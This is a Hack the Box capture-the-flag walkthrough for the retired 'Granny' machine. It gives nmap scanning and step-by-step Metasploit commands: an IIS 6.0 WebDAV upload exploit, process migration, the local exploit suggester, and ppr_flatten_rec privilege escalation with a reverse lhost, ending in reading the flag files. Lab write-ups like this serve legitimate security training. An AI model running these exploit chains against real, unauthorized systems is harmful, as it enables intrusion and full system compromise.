Hack the Box Challenge: Granny Walkthrough
Hello friends!! Today we are going to solve another CTF challenge “Granny” which is categories as retried lab presented by Hack the Box for making online penetration practices. Challenges in this lab is not hard to complete although they are like brain teaser for beginner as well as for expert penetration tester too.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Granny is 10.10.10.15 so let’s initiate with nmap port enumeration.
nmap -A 10.10.10. 15
From given below image, you can observe we found port 80 is open and Microsoft IIS 6.0 is running in victim’s network.
Significant port 80 is open in victim’s network we preferred to explore his IP in browser and resulting web page is shown below.
Since we know Microsoft IIS httpd 6.0 is running in victims system therefore when I Google I found Rapid 7 exploit for this as highlighted in given below image.
Without wasting time I open a new terminal and type msfconsole for loading metasploit framework and use module iis_webdav for exploiting targets system.
use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(windows/iis/iis_webdav_upload_asp) >set rhost 10.10.10.15
msf exploit(windows/iis/iis_webdav_upload_asp) >run
From given below image you can observe meterpreter shell session1 opened for accessing victim tty shell.
Every time my meterpreter session get died therefore I go post exploitation for migrating current process in to another process by executing following module.
use post/windows/manage/migrate
msf post(windows/manage/migrate)>set session 1
msf post(windows/manage/migrate)> run
Above module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.
use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit
Wonderful!! Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.
At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.
use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) >set session 1
msf exploit(windows/local/ppr_flatten_rec) >set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.6
msf exploit(windows/local/ppr_flatten_rec) > exploit
Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.
Meterpreter > getuid
As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.
Meterpreter > ls
Here we found Document and setting let’s explore
Inside c:\Document and Setting\Lakis \Desktop I found user.txt file and used type “file name” command for reading this file.
cd Desktop
cat user.txt
Great!! We got our 1st flag successfully
Inside c:\Document and Setting\Administrtator \Desktop I found root.txt file and used type “file name” command for reading this file.
cd Desktop
cat root.txt
Great!! We got our 2st flag successfully
Breaching this lab was interesting and enjoyable moment for me. It will take less time if you are aware of proper metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.
Happy Hacking!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Hack the Box Challenge: Granny Walkthrough appeared first on Hacking Articles.
from Hacking Articles https://ift.tt/2EdQktY